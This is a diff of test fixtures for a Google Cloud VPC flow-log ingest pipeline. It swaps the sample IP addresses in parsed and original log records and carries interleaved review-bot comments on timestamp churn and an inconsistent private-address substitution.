@@ -23820,8 +23820,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869272800Z", - "original": "{\"insertId\":\"1gq7q7afe373ew\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":56478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392501400Z", + "original": 
"{\"insertId\":\"1gq7q7afe373ew\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56478,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:20.566586739Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:20.450631492Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:47:20.450631492Z", "end": "2019-06-14T03:47:20.566586739Z", @@ -23842,10 +23842,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -23859,7 +23859,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:N5r6MyBXAb6L/bLUGnRfhE2dyYM=", + "community_id": "1:eQxAd3pzSyZzZxiE+1RzMSqyG04=", "bytes": 64140, "name": "default", "transport": "tcp", @@ -23882,7 +23882,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -23918,8 +23918,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869275500Z", - "original": "{\"insertId\":\"1gq7q7afe373e9\",\"jsonPayload\":{\"bytes_sent\":\"64140\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"371\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392507100Z", + "original": 
"{\"insertId\":\"1gq7q7afe373e9\",\"jsonPayload\":{\"bytes_sent\":\"64140\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33694},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"371\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566359759Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -23946,17 +23946,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 53096, "bytes": 1458, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:46cExc+emRbBX/kM/ZWcv8rVUgE=", + "community_id": "1:PZTJxnZbum9ENBi23DLcdTxQuaQ=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -23970,7 +23970,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -23995,8 +23995,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869278200Z", - "original": "{\"insertId\":\"1gq7q7afe373f9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392512800Z", + "original": 
"{\"insertId\":\"1gq7q7afe373f9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53096},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:20.813699795Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:20.700692281Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:43:20.700692281Z", "end": "2019-06-14T03:43:20.813699795Z", @@ -24023,18 +24023,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 231764, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 251 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:N5r6MyBXAb6L/bLUGnRfhE2dyYM=", + "community_id": "1:eQxAd3pzSyZzZxiE+1RzMSqyG04=", "bytes": 231764, "name": "default", "transport": "tcp", @@ -24056,7 +24056,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -24093,8 +24093,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869280900Z", - "original": "{\"insertId\":\"1gq7q7afe373f1\",\"jsonPayload\":{\"bytes_sent\":\"231764\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392518300Z", + "original": 
"{\"insertId\":\"1gq7q7afe373f1\",\"jsonPayload\":{\"bytes_sent\":\"231764\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566359759Z", "end": "2019-06-14T03:49:59.565311154Z", @@ -24117,9 +24117,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65276, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -24133,7 +24133,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BPNXWYQI8he7USxOsykyWmD0NE8=", + "community_id": "1:yOQ797bLdJqqOXP0XZt1Vg63dm0=", "bytes": 107878, "transport": "tcp", "type": "ipv4", @@ -24148,7 +24148,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -24172,8 +24172,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869283600Z", - "original": "{\"insertId\":\"1gq7q7afe373ff\",\"jsonPayload\":{\"bytes_sent\":\"107878\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65276,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"614\",\"reporter\":\"SRC\",\"rtt_msec\":\"156\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392523800Z", + "original": 
"{\"insertId\":\"1gq7q7afe373ff\",\"jsonPayload\":{\"bytes_sent\":\"107878\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65276,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"614\",\"reporter\":\"SRC\",\"rtt_msec\":\"156\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760349279Z", "end": "2019-06-14T03:49:56.220621567Z", @@ -24200,18 +24200,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 52430, "bytes": 595838, "domain": "zeek-nsm", - "ip": "198.51.100.88", + "ip": "67.43.156.14", "packets": 299 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Ymi/D60yNYon9EIJPZfAYxcQ+xc=", + "community_id": "1:qGRQsZIORaZZvgSDCjliRbZbsD0=", "bytes": 595838, "name": "default", "transport": "tcp", @@ -24233,7 +24233,7 @@ }, "related": { "ip": [ - "198.51.100.88", + "67.43.156.14", "10.139.99.242" ] }, 
@@ -24270,8 +24270,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869286900Z", - "original": "{\"insertId\":\"1gq7q7afe373fq\",\"jsonPayload\":{\"bytes_sent\":\"595838\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"198.51.100.88\",\"src_port\":52430},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"299\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", + "ingested": "2021-12-09T13:37:46.392528Z", + "original": 
"{\"insertId\":\"1gq7q7afe373fq\",\"jsonPayload\":{\"bytes_sent\":\"595838\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":52430},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"299\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:07.968717244Z", "end": "2019-06-14T03:49:53.081386115Z", @@ -24292,9 +24292,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 56410, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -24308,7 +24308,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:0c52Gpv2d5YT01CRixtDXpBMSJQ=", + "community_id": "1:4Pc6C8KshAP3IEqmZaW0jzA00wQ=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -24323,7 +24323,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { 
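Review bot: Every hunk in this file also rewrites `event.ingested` (`2021-06-09T10:48:29.869286900Z` → `2021-12-09T13:37:46.392528Z` in the hunk at 24270, and likewise at 24172, 24347, 24424 and onward), which is regeneration noise rather than part of the IP fix and makes the real changes harder to audit. If the test runner's config supports excluding dynamic fields from comparison, listing `event.ingested` there would stop these fixtures from churning on every regeneration; otherwise a note in the PR description that the timestamp deltas are incidental would help reviewers.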
@@ -24347,8 +24347,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869289700Z", - "original": "{\"insertId\":\"14iipwlfd8t01n\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":56410,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"37\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392532700Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01n\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56410,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"37\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:47:10.514594429Z", "end": "2019-06-14T03:47:10.630345069Z", @@ -24369,9 +24369,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 51950, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -24385,7 +24385,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:pHA6HHmyea3zNeMwTBqwG+WoGI0=", + "community_id": "1:jcjE3OEEgs/JCmhTXaJJ97LHMMA=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -24400,7 +24400,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { 
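Review bot: The substitution `192.0.2.117` → `192.168.2.117` in the hunks at 24369 and 24400 (and in the `original` payload at 24347) replaces an RFC 5737 TEST-NET-1 documentation address with an RFC 1918 private address, so this record now describes a private destination that still carries public-network metadata (`as.number: 15169`, payload `dest_location` with `country: usa`), which is internally inconsistent and does not match the stated intent of moving to supported public IPs. The same private-range swap recurs in the hunks at 24550/24574, 24621/24652, 24781/24805 and, as `192.0.2.73` → `192.168.2.73` with a Beijing/ASN 4847 payload, at 25012/25043 and 25067. If the pipeline treats private ranges differently (for example skipping geo enrichment or classifying direction), the expected output here would not reflect real-world behaviour for these events; a further address from the supported public subset, assuming one is available, would keep the fixture coherent.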
@@ -24424,8 +24424,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869292400Z", - "original": "{\"insertId\":\"14iipwlfd8t01j\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":51950,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392537700Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01j\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":51950,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:41:50.645030007Z", "end": "2019-06-14T03:41:50.757658840Z", @@ -24446,10 +24446,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33876, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -24463,7 +24463,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:dURBkayd+umbcZOJIS7+sTQjLag=", + "community_id": "1:E5NvH5JkoYJgVzpBa96RbCFEXPs=", "bytes": 361966, "name": "default", "transport": "tcp", @@ -24486,7 +24486,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
